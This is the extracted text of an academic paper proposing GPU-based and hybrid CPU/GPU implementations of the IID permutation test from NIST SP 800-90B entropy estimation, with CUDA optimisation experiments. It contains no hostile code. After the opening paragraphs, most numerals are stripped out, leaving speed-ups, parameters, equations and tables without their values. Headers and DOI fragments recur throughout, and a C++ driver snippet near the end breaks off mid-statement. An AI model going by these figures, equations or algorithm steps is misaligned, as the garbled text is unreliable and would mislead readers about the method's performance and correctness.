The United States National Institute of Standards and Technology (NIST) Special Publication (SP) 800-90B (Barker & Kelsey; Sönmez Turan et al.) is a standard document for estimating the entropy of the noise source. The general flow of the entropy estimation process in SP 800-90B (Sönmez Turan et al.) is to determine the track, estimate the entropy according to the track, and then apply the restart test, as summarized in Fig. 1. In this paper, determining the track is referred to as an independent and identically distributed (IID) test. There are two different tracks: an IID track and a non-IID track. If the IID track is determined, it is assumed that the samples of the noise source are IID; otherwise, the samples are non-IID. The estimator for the IID or non-IID track then estimates the entropy of the noise source. The restart test evaluates the estimated entropy using different outputs from many restarts of the noise source to check for overestimation. This document is currently used in the Cryptographic Module Validation Program (CMVP) and has been cited as a recommendation for entropy estimation in an ISO standard document (ISO/IEC) on test and analysis methods for RNGs.

The principles of the entropy estimators in SP 800-90B have been investigated and analyzed theoretically (Kang, Park & Yeom; Zhu et al.). However, it is difficult to find research on the efficient implementation of the entropy estimation process of SP 800-90B. NIST provides two programs (NIST) on GitHub for the entropy estimation process of SP 800-90B. The first program is for the entropy estimation process of the second draft of SP 800-90B (Sönmez Turan et al.), written in Python. The second program is for the entropy estimation process of the final version of SP 800-90B (Sönmez Turan et al.), written in C++. Table 1 displays the execution times of the two single-threaded NIST programs on the central processing unit (CPU). The noise source used as input is GetTickCount, with a sample size of 32 bits. GetTickCount can be collected through the GetTickCount() function in the Windows environment. Since GetTickCount is determined to be non-IID by the IID test, the IID-track entropy estimation does not run. The entropy estimation process of the IID track takes approximately one second for both NIST programs
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. figure flow of the entropy estimation process of sp - b. full-size doi: . /peerjcs. /fig- table execution time of each single-threaded nist program for the entropy estimation process (noise source: gettickcount; noise sample size: bits). nist program written in python nist program written in c++ iid test h h min [iid track] estimation entropy − − [non-iid track] estimation entropy min s restart tests s min total execution time h min h min if it is forcibly operated. in table , the iid test consumes the majority of the total execution time in both programs. developers of cryptosystems or cryptographic modules should estimate the entropy of the noise sources to analyze the security of the rng. since the entropy estimation process of sp - b is representative, and modules for the cmvp shall be tested for compliance with sp - b (nist & cse, ), most developers use the method of sp - b. furthermore, since cmvp implementation guidance (ig) gives the link of the nist programs (nist & cse, ), most developers use the nist programs to reduce the time required for implementation. as recommended by the cmvp, the rng should use at least one noise source. since the nist program estimates the entropy for one noise source, kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the developer should run the nist program k times when the rng uses k noise sources. since the noise sources are different for each operating system, the developer should run the program k×s times if the developer’s cryptosystem or cryptographic module supports s operating systems. the distribution of the noise source may be changed due to mechanical or environmental changes or to the timing variations in human behavior (nist & cse, ). the physical noise source is based on a dedicated physical process (iso/iec- , ); it may be affected by the environment of the device in which the rng operates. therefore, to claim that the noise source has an identical distribution in any environment, the developer should perform the iid test and entropy estimation in several environments or devices. if the developer performs analysis on d devices, the developer should run the program k×s×d times. if k= , s= , and d = , the developer should run the nist program times. according to table , the nist program written in c++ requires approximately h to estimate the entropy of one noise source. if the developer cannot run multiple nist programs simultaneously, it takes about hours or approximately four days. moreover, to find k noise sources that can be used as inputs of the rng in the environment, the developer should perform entropy estimation for k or more collectible noise sources. therefore, it may take more than hours. the developer of the cryptographic module for the cmvp should perform similar work for re-examination or new examination every specific period since the module will be placed on the cmvp active list for five years. the evaluator running checks based on the documentation submitted by the developer for the cmvp may run the nist program multiple times as well. as this runtime may be burdensome for developers, it can be tempting to use an rng without security analysis. thus, if the developer’s rng is vulnerable, this vulnerability is likely to affect the overall security of the cryptosystem or cryptographic module. 
graphics processing units (gpus) are excellent candidates to accelerate the process of sp - b, especially the iid test. gpus were initially designed for accelerating computer graphics and image processing, but they have become more flexible, allowing them to be used for general computations in recent years. the use of gpus for performing computations handled by cpus is known as general-purpose computing on gpus (gpgpus). new parallel computing platforms and programming models, such as the computing unified device architecture (cuda) released by nvidia, enable software developers to leverage gpgpus for various applications. gpgpus are used in cryptography as well as areas including signal processing and artificial intelligence. numerous studies have been conducted on the parallel implementations of cryptographic algorithms such as aes, ecc, and rsa (neves & araujo, ; li et al., ; pan et al., ; ma et al., ; li et al., ) and on the acceleration of cryptanalysis, including hash collision attacks using gpus (stevens et al., ). to process the entire iid test in parallel using gpu, approximately gb or more of the global memory of the gpu are required. since the compression test used in the iid test requires a different technique of implementation from the other statistical tests, a cuda version of the compression test is needed to implement the iid test in parallel. however, bzip used in the compression test is not actively under development as a cuda version since it is unsuitable for gpu implementation. therefore, we propose a gpu-based parallel kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. implementation of the iid test without the compression test using multiple optimization techniques. the adaptive size of the global memory used in the kernel function can be set so that maximal performance improvement can be obtained from the gpu specification in use. moreover, we propose a hybrid cpu/gpu implementation of the iid test that includes the compression test. our gpu-based implementation is approximately times faster than the multi-threaded nist program without the compression test when determining the noise source as the iid. it is approximately times faster when determining the noise source as the non-iid. our hybrid cpu/gpu implementation is and times, respectively, faster than the multi-threaded nist program with the compression test when determining the noise source as the iid and the non-iid, respectively. most noise sources are non-iid (kelsey, ). the non-iid noise sources are disk timings, interrupt timings, jitter (müller, ), gettickcount, and so on. since the proposed hybrid cpu/gpu implementation has better performance for the non-iid noise sources, we expect it to be highly practical. the remainder of this paper is organized as follows. ‘preliminaries’ introduces the cuda gpu programming model, the openmp programming model, and the iid test of sp - b. ‘proposed implementations’ outlines our gpu-based parallel implementation of the iid test and the hybrid cpu/gpu implementation of the iid test. in ‘experiments and performance evaluation’, the experimental results on the optimization and performance of our methods are presented and analyzed. finally, ‘conclusions’ summarizes and concludes the paper. preliminaries cuda programming model nvidia cuda (nvidia, b) is the most widely used programming model for gpus. cuda uses the single instruction multiple thread (simt) model. 
a kernel is a function that performs the same instruction on the gpu in parallel. a thread is the smallest unit operating the instructions of the kernel function. multiple threads are grouped into a cuda block, and multiple blocks are grouped into a grid. a cuda-capable gpu contains numerous cuda cores, which are fundamental computing units and execute the threads. cuda cores are collected into groups called streaming multiprocessors (sms). a kernel is launched from the host (cpu) to run on gpu and generate a collection of threads organized into blocks. each cuda block is assigned to one of the sms on the gpu and executes independently on gpu. the mapping between blocks and sms is done by a cuda scheduler (vaidya, ). an sm can concurrently execute the smaller group of threads, which is called a warp. all threads in a warp execute the same instruction, and there are threads in a warp on most cuda-capable gpus. latency can occur, such as data required for computation have not yet been fetched from global memory that the access is slow. to hide the latency, an sm can execute context-switching, which transfers control to another warp while waiting for the results. the memory of cuda-capable gpu includes global memory, local memory, shared memory, register, constant memory, and texture memory. table shows the memory kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table memory of cuda-capable gpu (nvidia, a). memory location on/off chip access scope lifetime register on r /w thread thread local off r /w thread thread shared on r /w all threads in block block global off r /w all threads +host host allocation constant off r all threads +host host allocation texture off r all threads +host host allocation types listed from top to bottom by access speed from fast to slow, and their principal characteristics. a basic frame of the program using the cuda programming model is as follows: allocate memory in the device (gpu) and transfer data from the host to the device (if necessary); launch the kernel; transfer data from the device to the host (if required). openmp programming model open multi-processing (openmp) (openmp, ) is an application programming interface (api) for parallel programming on the shared memory multiprocessors. it extends c, c++, and fortran on many platforms, instruction-set architectures, and operating systems, including linux and windows with a set of compiler directives, library routines, and environment variables. openmp facilitates the parallelization of the sequential program. the programmer adds parallelization directives to loops or statements in the program. openmp uses the fork-join parallelism (openmp, ). openmp program begins as a single thread of execution, called an initial thread. when the initial thread encounters a parallel construct, the thread spawns a team of itself and zero or more additional threads as needed and becomes the master of the new team. the statements and functions in the parallel region are executed in parallel by each thread in the team. all threads replicate the execution of the same code unless a work-sharing directive (such as for dividing the computation among threads) is specified within the parallel region. variables default to shared among all threads in parallel region. terms a sample is data obtained from one output of the (digitized) noise source and the sample size is the size of the (noise) sample in bits. 
for example, we collect a sample of the noise source gettickcount in windows by calling the gettickcount() function once. in this case, the sample size is bits. however, as certain estimators of sp - b do not support samples larger than bits, it is necessary to reduce the sample size. gettickcount is the elapsed time (in milliseconds) since the system was started. thus, it is thus easy to conclude that the low-order bits in the sample of gettickcount contain most of the variability. therefore, it would be reasonable to reduce the -bit sample to an -bit sample by using the lowest bits. the entropy estimation of sp - b is performed on input kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data consisting of one million samples, where each sample size is bits. furthermore, the maximum of the min-entropy per sample is . iid test for entropy estimation the iid test of sp - b consists of permutation testing and five additional chi-square tests. permutation testing identifies evidence against the null hypothesis that the noise source is iid. since the permutation testing is the most time-consuming step in the entire iid test, we only focus on the permutation testing in this study. algorithm permutation testing (sönmez turan et al., ). require: s=(s ,...,sl), where si is the noise sample and l= , , . ensure: decision on the iid assumption. : for statistical test i do : assign the counters ci, and ci, to zero. : calculate the test statistic testini on s. : end for : for j= to , do : permute s using the fisher–yates shuffle algorithm. : calculate the test statistic testshufflei on the shuffled data. : if (testshufflei > test in i ) then : increment ci, . : else if (testshufflei =test in i ) then : increment ci, . : end if : end for : if ((ci, +ci, ≤ )or(ci, ≥ , )) for any i then : reject the iid assumption. : else : assume that the noise source outputs are iid. : end if algorithm presents the algorithm of the permutation testing described in sp - b. the permutation testing first performs statistical tests on one million samples of the noise source, namely the original data. we refer to the results of the statistical tests as the original test statistics. thereafter, permutation testing carries out , iterations, as follows: in each iteration, the original data are shuffled, the statistical tests are performed on the shuffled data, and the results are compared with the original test statistics. after , iterations, the ranking of the original test statistics among the shuffled test statistics is computed. if the rank belongs to the top . % or bottom . %, the permutation testing determines that the original data (input) are not iid. that is, it concludes that the original data are not iid if eq. ( ) is satisfied for any i that is the index of the statistical test. for any i, the counter ci, is the number of j in step of alg:alg satisfying the shuffled test statistic testshufflei > the original test statistic test in i . the counter ci, is the number of kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm permutation testing of nist program written in c++. require: s=(s ,...,sl), where si is the noise sample and l= , , . ensure: decision on the iid assumption. : for statistical test i do : assign the counters ci, and ci, to zero. : calculate the test statistic testini on s. : end for : for j= to , do : permute s using the fisher–yates shuffle algorithm. 
: for statistical test i do : if statusi= true then : calculate the test statistic testshufflei on the shuffled data. : if (testshufflei > test in i ) then : increment ci, . : else if (testshufflei =test in i ) then : increment ci, . : else : increment ci, . : end if : if ((ci, +ci, > )and(ci, +ci, > )) then : statei= false. : end if : end if : end for : end for : if ((ci, +ci, ≤ )or(ci, ≥ , )) for any i then : reject the iid assumption. : else : assume that the noise source outputs are iid. : end if algorithm fisher–yates shuffle (sönmez turan et al., ). require: s=(s ,...,sl), where si is the noise sample and l= , , . ensure: shuffled s=(s ,...,sl). : for i from l downto do : generate a random integer j such that ≤ j≤ i. : swap sj and si. : end for kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. j satisfying testshufflei =test in i , whereas the counter ci, is the number of j satisfying testshufflei < test in i .( ci, +ci, ≤ ) or ( ci, ≥ , ) ( ) equivalently, the permutation testing determines that the original data are iid if eq. ( ) is satisfied for all i that is the index of the statistical test.( ci, +ci, > ) and ( ci, +ci, > ) ( ) the nist optimized the permutation testing of the nist program written in c++ using eq. ( ). thus, even if each statistical test is not performed , times completely, the permutation testing can determine that the input data are iid. algorithm is the improved version of the permutation testing optimized by the nist. we briefly introduce the shuffle algorithm and the tests used in the permutation testing. the shuffle algorithm is the fisher–yates shuffle algorithm presented in algorithm . the permutation testing uses statistical tests, the names of which are as follows: • excursion test • number of directional runs • length of directional runs • number of increases and decreases • number of runs based on the median • length of runs based on the median • average collision test statistic • maximum collision test statistic • periodicity test • covariance test • compression test* the aim of the periodicity test is to measure the number of periodic structures in the input data. the aim of the covariance test is to measure the strength of the lagged correlation. thus, the periodicity and covariance tests take a lag parameter as input and each test is repeated for five different values of the lag parameter: , , , , and (sönmez turan et al., ). therefore, a total of statistical tests are used in the permutation testing. if the input data are binary (that is, the sample size is bit), one of two conversions is applied to the input data for some of the statistical tests. the descriptions of each conversion and the names of the statistical tests using that conversion are as follows (sönmez turan et al., ): conversion i conversion i divides the input data into -bit non-overlapping blocks and counts the number of s in each block. if the size of the final block is less than bits, zeroes are appended. the numbers and lengths of directional runs, numbers of increases and decreases, periodicity test, and covariance test apply conversion i to the input data. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. conversion ii conversion ii divides the input data into -bit non-overlapping blocks and calculates the integer value of each block. if the size of the final block is less than bits, zeroes are appended. 
the average collision test statistic and maximum collision test statistic apply conversion ii to the input data. for example, let the binary input data be ( , , , , , , , , , , , ). for conversion i, the first -bit block includes four s and the final block, which is not complete, includes three s. thus, the output data of conversion i are ( , ). for conversion ii, the integer value of first block is and the final block becomes ( , , , , , , , ) with an integer value of . thus, the output of conversion ii is ( , ). proposed implementations target of gpu-based parallel processing steps to of algorithm , with , iterations, consume most of the processing time of the permutation testing. the shuffle algorithm and statistical tests are performed on the data with one million samples of the noise source in each iteration. hence, it is natural to consider the gpu-based parallel implementation of , iterations, which are processed sequentially in the permutation testing. the implementation of the compression test* differs from those of the other statistical tests used in the permutation testing. the compression test* uses bzip (seward, ), which compresses the input data using the burrows–wheeler transform (bwt), the move-to-front (mtf) transform, and huffman coding. there have been studies on the parallel implementation of bzip using the gpu. in patel et al. ( ), all three main steps, namely the bwt, the mtf transform, and huffman coding, were implemented in parallel using the gpu. however, the performance was . times slower than that of the cpu implementation. in shastry et al. ( ), only the bwt was computed on the gpu and a performance improvement of . times that of the standard cpu-based algorithm was achieved. however, we couldn’t apply this approach, because our parallel test should be implemented on the gpu together with other statistical tests. moreover, the compression test does not play a key role in algorithm . that is, it is infrequent for a noise source to be determined as the non-iid only by the compression test results among the statistical tests used in the permutation testing. therefore, we design the gpu-based parallel implementation of the permutation testing consisting of the shuffle algorithm and statistical tests, without the compression algorithm. moreover, we design the hybrid cpu/gpu implementation of the permutation testing consisting of our gpu-based parallel implementation and a maximum of , compression tests using openmp. overview of gpu-based parallel permutation testing approximately . gb (= , × one million bytes of data) of the global memory of the gpu is required for the cpu to invoke a cuda kernel to process , iterations of the permutation testing in parallel on the gpu. some gpus do not have more than gb of global memory. therefore, we propose the gpu-based parallel implementation of the kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure cpu/gpu workflow of gpu-based parallel implementation of permutation testing. (a) code running on the host/cpu. (b) code running on the device/gpu. full-size doi: . /peerjcs. /fig- permutation testing, which processes n iterations in parallel on the gpu according to the user’s gpu specification and repeats this process r=d , /ne times. figure presents the workflow of the cpu and gpu. the host refers to a general cpu that executes the program sequentially, whereas the device refers to a parallel processor such as a gpu. in steps to of fig. 
, the host performs statistical tests on one million bytes of the input data (without shuffling) and holds the results. in step , the host calls a function that allocates the device memory required to process n iterations in parallel on the device. the use and size of the variables are listed in table . in step , the input data (no. in table ), and the results of the statistical tests in steps to (no. in table ) are copied from the host to the device. in step , the host launches a cuda kernel curandinit, which initializes the n seeds used in the curand() function. the curand() function that generates random numbers using seeds on the device is invoked by the cuda kernel shuffling. when the host receives the completion of the kernel curandinit, the host proceeds to steps to . , iterations are divided into r rounds and each round processes n iterations in parallel on the device. to process n iterations, the host launches the cuda kernel shuffling (step ) and then launches the cuda kernel statistical test (step ) as soon as the host receives the completion of the kernel shuffling. when the host receives the completion of the kernel statistical test, in step , the counters kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table use and size of variables allocated to gpu. no. use of variable size of variable (bytes) original data (input) , , n shuffled data n × , , n seeds used by curand() function n× sizeof(curandstate)=n × original test statistics × sizeof(double)= counter ci, ,ci, ,ci, for ≤ i≤ × sizeof(int)× = n shuffled data after conversion ii (only used if the input is binary) n × , ci, , ci, , and ci, for i∈{ , ,..., }, which indicate the indices of the statistical tests, are copied from the device to the host. following the operations in steps to of algorithm , which correspond to those in steps and of fig. , the host moves on to step if eq. ( ) is satisfied for all i. finally, in step , the host determines whether or not the input data are iid. when the input data are binary, two conversions should be considered when designing the cuda kernels. therefore, we describe the cuda kernels designed to process n iterations in parallel on the gpu depending on whether the input data are binary. the descriptions of the cuda kernels shuffling and statistical test for non-binary noise sample are as follows: cuda kernel shuffling the kernel shuffling generates n shuffled data by permuting one million bytes of the original data n times in parallel. thus, each of n cuda threads permutes the original data using the fisher–yates shuffle algorithm and then stores the shuffled data in the global memory of the device. as the shuffle algorithm uses the curand() function, each thread uses its unique seed that is initialized by the kernel curandinit with its index, respectively. cuda kernel statistical test the kernel statistical test performs statistical tests on each of n shuffled data, and compares the shuffled and original test statistics. the size of each shuffled data is one million bytes and n shuffled data are stored in the global memory of the device. in this section, we present two methods that can easily be designed to handle this process in parallel on the gpu and propose an optimized method. parallelization method one cuda thread performs statistical tests sequentially on one shuffled dataset. this method is illustrated in fig. . 
if this method is applied to the kernel statistical test, b′=(n /t) cuda blocks are used when the number of cuda threads is t . however, because each thread runs tests in sequence, room for improvement is apparent in this method. parallelization method in this method, each block performs its designated statistical test out of tests on one shuffled dataset shared by blocks. thus, for one shuffled set, statistical tests are run in parallel, and this kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method is a parallelization of the serial part in method above. this method is illustrated in fig. , which indicates the kernel statistical test with b′=((n /t)× ) cuda blocks and t threads in a block. proposed optimiza- tion this method optimizes parallelization method through two steps. (step ) to hide the latency in accessing the slow global memory of the gpu, we analyzed the runtime of statistical tests from an algorithmic perspective. we merged several statistical tests with similar access patterns to the global memory into a single test. therefore, merged statistical tests replace statistical tests. (step ) when analyzed the execution time of nine merged tests, the execution time of one longest test was similar to the sum of the execution times of the remaining eight tests. we configured each thread of a block to runs the longest test and each thread of the other block to run eight merged tests so that the workload between sms is balanced. this method is depicted in fig. , where the kernel statistical test uses b′=((n /t)× ) cuda blocks, with t threads in each block. with slight modifications to the kernels shuffling and statistical test, which are designed for non-binary samples, as described above, we can parallelize the permutation testing when the input data are binary. if the noise sample size is bit, one of two conversions is applied to certain statistical tests. the data after conversion i and data after conversion ii can be stored separately in the global memory. since the data after conversion i are the result of calculating the hamming weight of the data following conversion ii, we designed to minimize the use of global memory as follows: in the kernel shuffling, n cuda threads first generate n shuffled data in parallel. thereafter, each thread proceeds to conversion ii for its own shuffled data and stores the results (no. in table ) in the global memory of the gpu. the kernel statistical test runs nine merged tests. the merged tests that required conversion i calculate the hamming weight of the data after conversion ii. as in the optimized method for non-binary data, the thread in the block executes at least one test so that the execution time of each block is similar. therefore, b′=(n /t)× cuda blocks are used when the number of cuda threads is t . overview of hybrid cpu/gpu implementation of permutation testing we implemented the gpu-based permutation testing, which comprised statistical tests without the compression algorithm and is parallel on the gpu. this section presents a hybrid cpu/gpu implementation of permutation testing that includes the compression algorithm. as shown in fig. , we designed the hybrid implementation to perform , shuffling and compression tests using openmp according to the result of our gpu- based permutation testing. the noise source is determined as the non-iid if at least one test does not satisfy eq. ( ), as shown in algorithm . therefore, if our gpu-based kim and yeom ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure general parallel method of kernel statistical test. full-size doi: . /peerjcs. /fig- figure general parallel method of kernel statistical test. full-size doi: . /peerjcs. /fig- kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure proposed optimization method of kernel statistical test. full-size doi: . /peerjcs. /fig- program determined that the input noise source is non-iid, our hybrid program finally determines that the input is non-iid, without compression tests. if our gpu-based program determined that the input is iid, the noise source might be determined to be iid or be determined to be non-iid only by the result of the compression test. therefore, our hybrid program performs at most , shuffling and compression tests in parallel using openmp. if the results of the compression tests satisfy eq. ( ), the noise source is finally determined as the iid; otherwise, it is determined as the non-iid. experiments and performance evaluation in this section, we analyze the performance of the proposed methods and compare its performance with the nist program written in c++. the performance was evaluated using two hardware configurations (table ). there are two noise sources used in experiments. the first noise source is truerand provided by the nist. the second noise source, gettickcount, could be collected through the gettickcount() function in the windows environment. the sample size of each noise source is , , or bits. as a result of confirming whether the input data are iid by the iid test, truerand was determined as the iid noise source; however, gettickcount was determined as the non-iid noise source. kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure proposed hybrid cpu/gpu program of permutation testing. (a) process on the host/cpu. (b) process on the device/gpu. full-size doi: . /peerjcs. /fig- the experimental result is the average of the results repeated times. the difference between the results of the experiments repeated times was within %. since the gpu boost technology, which controls the clock speed according to extra power availability, is used in nivida gpu, the results are with the gpu boost applied, unless otherwise noted. gpu optimization concepts we conducted experiments on the optimization concepts considered while gpu-based parallelizing the permutation testing. the experimental data used in this section consisted of one million samples collected from the noise source gettickcount, where the sample size was bits. in the experiments, we set t , the number of threads per block used in the cuda kernel, to , a multiple of the warp size (= ). since t is set to , we set n to , , which is the multiple t , and used about gb (= n× , , bytes) of the global memory of the gpu. coalesced memory access we used the memory coalescing technique (fig. ) to transfer data from slow global memory to the registers efficiently. table displays the performance of our parallel implementation of the permutation testing before and after using this technique. permutation testing used kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table configurations of experimental platforms. 
name device a device b cpu model intel(r) core (tm) i - k intel(r) core (tm) i - cpu frequency . ghz . ghz cpu cores cpu threads accelerator type nvidia gpu nvidia gpu models titan xp geforce gtx multiprocessors (sms) cuda cores/sm cuda capability major . . global memory , mb , mb gpu max clock rate , mhz , mhz memory clock rate , mhz , mhz registers/block , , threads/sm , , threads/block , , warp size cuda driver version . . figure memory coalescing technique. full-size doi: . /peerjcs. /fig- kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance of proposed gpu-based parallel implementation of permutation testing de- pending on whether memory coalescing technique was used (the number of cuda blocks = , the number of threads per block = ). before using memory coalescing technique (s) after using memory coalescing technique (s) device a . . device b . . the kernel statistical test with our optimization method. as a result, we improved performance by . times. all experiments after this section use the memory coalescing technology. merging statistical tests our optimization method consists of a step in which tests are merged (step ) and a step in which at least one test is allocated in the cuda block so that the working time of each thread is similar (step ). therefore, we confirmed the validity of our merged tests. we first designed new cuda kernels for experimentation, where each of the n threads performed one statistical test on one shuffled data. we measured the execution time of each test kernel. each test kernel used eight cuda blocks since we set the number of threads per block t to . the experimental results showing the execution time of each statistical test on the gpu are shown in table . from table , it takes approximately four seconds if one thread sequentially performs statistical tests. however, if one thread performs nine merged tests, it can be expected that it will take about . seconds. we improved the performance for all statistical tests by about . times by combining the tests. we measured the execution time of the parallelization method applied step , and our method. referring to the results of table , we designed each cuda block of method which step was applied to proceed with each of tests ∼ , test , test , and tests ∼ ; each block can complete its work in a similar time. the kernel statistical test applying this method uses (=(n /t)× ) blocks; however, applying our proposed method uses (= (n /t)× ) blocks. table presents the execution time of a kernel statistical test with each method applied. as a result, our method is about . times faster than the parallelization method applied step . parallelism methods we experimentally verified whether the proposed optimization method is better than other methods. we first confirmed the difference in the operation time of each cuda thread in the kernel statistical test, where each parallelization method is applied by drawing a figure. figure displays the operation times of the cuda threads, assuming that the gpu had three sms and considering the results of table . it is the task of the gpu scheduler to allocate the cuda blocks to the sms; however, these were assigned arbitrarily for visualization in fig. . as indicated in table , the statistical tests had different execution times. therefore, we expressed the different lengths of the threads in kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. table left: execution time of each statistical test on gpu; right: execution time of each merged statistical test on gpu (device a, number of cuda blocks = , number of threads per block = ). no. name of statistical test execution time (ms) no. name of merged statistical test execution time (ms) excursion test ′ excursion test number of directional runs ′ directional runs and number of inc/dec length of directional runs numbers of increases and decreases number of runs based on median ′ runs based on median length of runs based on median average collision test statistic , ′ collision test statistic , maximum collision test statistic , periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) periodicity test (lag= ) ′ per/cov test (lag= ) covariance test (lag= ) table performance of parallelization method applied step and our method (device a, the num- ber of threads per block = ). number of cuda blocks execution time (s) parallelization method ( tests) +step . our method ( merged tests +step ) . the cuda blocks running each statistical test, as illustrated in fig. . in the proposed method, several statistical tests were merged for optimization. the execution time of the merged statistical test (table ) was equal to or slightly longer than each execution time of the original statistical tests prior to merging (table ). suppose that test & is a merged function of test and test . the lengths of the threads in the block running test & were slightly longer than those of the threads in the block running test or test , as indicated in fig. . as illustrated in fig. , we expected that our optimization outperformed parallelization methods and . we measured the execution time of a kernel statistical test according to the parallel method. table shows the execution times of each kernel measured on both devices. if the occupancy of the kernel in our parallelization method is calculated, it reaches %. it is the occupancy per sm. since our method uses a small number of blocks, there may be idle sms on a high-performance gpu with many sms. however, if the host calls the test kernel kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure operation times of cuda threads in kernel statistical test when applying each method on device. full-size doi: . /peerjcs. /fig- table execution time of kernel statistical test according to parallel method (number of threads per block = ). execution time (s) method number of cuda blocks device a device b parallelization method . . parallelization method . . our optimization (step ) . . our optimization (step & ) . . for each noise source simultaneously using a multi-stream technique, we can use almost full gpu capability. since statistical tests were running in parallel, the parallelization method was improved by . times over method in device a; however, there was no improvement in the performance in device b. in device b, the number of sms was , and the number of active blocks was calculated by eight. thus, it is analyzed as the result derived since the number of blocks generated by the kernel (= ) is more than the number of blocks active in the device simultaneously (= ). our method (step ) is about . and . 
times, respectively, faster than the parallelization method in device a and device b. it is analyzed as the results due to the merged statistical tests that improved the performance, kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure execution time of the gpu-based parallel implementation of permutation testing according to parallel method (number of threads per block = ). full-size doi: . /peerjcs. /fig- as confirmed in the previous section. since the work of each cuda block was adequately balanced, it is analyzed that our method (step & ) was slightly improved over our method (step ). furthermore, our method is times and about . times, respectively, faster than the parallelization method in device a and device b. next, we analyzed how each method affected the performance of gpu-based implementation of permutation testing. as shown in algorithm , the permutation testing has , iterations. since implemented n iterations in parallel, the kernel curandinit is called once, and the kernel shuffling and statistical test are called d , /ne times. since we set n to , and did not use eq. ( ) in this experiment, the permutation testing consists of one curandinit, five shuffling and five statistical test. figure shows the execution time of this permutation testing according to the parallelization method. the permutation testing applied our method shows an improvement of about . times over the permutation testing applied method . thus, our optimization method outperformed parallelization methods and . performance evaluation of gpu-based permutation testing according to the parameter parameter n is the number of iterations of the permutation testing to be processed in parallel. we measured the performance of the gpu-based parallel implementation of the permutation testing according to the value of the parameter n . as shown in fig. , the kernel curandinit is called once. the kernel shuffling and statistical test are called at most d , /ne times. the calling process repeated is as follows: after the kernel shuffling and the kernel statistical test are sequentially run once, if the results do not satisfy eq. ( ), each kernel is called again. if each kernel kim and yeom ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table execution time of the gpu-based parallel permutation testing according to the value of the parameter n . parameter n , , , , , global memory (gb) . . . . . execution time (s) truerand . . . . . device a gettickcount . . . . . truerand . . . − − device b gettickcount . . . − − has been called d , /ne times or the results satisfy eq. ( ), the call to each kernel is aborted. if the noise source is iid, there is little evidence against the null hypothesis that the noise source is iid in the permutation testing. the probability of satisfying eq. ( ) increases, and the number of the calls of the kernel decreases. on the other hand, if the noise source is non-iid, the probability of satisfying eq. ( ) decreases, and the number of the calls increases, contrary to the iid noise source case. therefore, we used truerand and gettickcount, which were determined as the iid and the non-iid, respectively, by permutation testing. the sample size of each noise source is bits. permutation testing performs , iterations, so we set n to be a factor of , and t to . 
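to make the round structure concrete, the following host-side c++ sketch outlines the calling process described above; the launchRound callback and the counters layout are our own placeholders for the cuda kernel launches and device-to-host copies, not the actual nist or proposed program code.

#include <functional>
#include <vector>

// simplified host-side driver: 10,000 iterations are processed in
// rounds = ceil(10,000 / n) rounds of n parallel iterations each, and the
// remaining rounds are skipped as soon as every statistical test already
// satisfies eq. (2).
struct Counters { long c0 = 0, c1 = 0, c2 = 0; };   // c_i,0, c_i,1, c_i,2

bool satisfiesEq2(const Counters& c) {
    return (c.c0 + c.c1 > 5) && (c.c1 + c.c2 > 5);
}

// launchRound stands in for "launch the shuffling kernel, launch the
// statistical-test kernel, and copy the accumulated counters back to the host".
bool permutationTestingIID(int n, int numTests,
                           const std::function<void(std::vector<Counters>&)>& launchRound) {
    const int totalIterations = 10000;
    const int rounds = (totalIterations + n - 1) / n;   // ceil(10,000 / n)
    std::vector<Counters> counters(numTests);

    for (int r = 0; r < rounds; ++r) {
        launchRound(counters);                          // one round of n iterations on the gpu

        bool allPass = true;                            // does eq. (2) hold for every test?
        for (int i = 0; i < numTests; ++i)
            allPass = allPass && satisfiesEq2(counters[i]);
        if (allPass) return true;                       // early exit: the data are assumed iid
    }
    for (int i = 0; i < numTests; ++i)                  // otherwise decide by eq. (1) per test
        if (counters[i].c0 + counters[i].c1 <= 5 || counters[i].c0 >= 9995)
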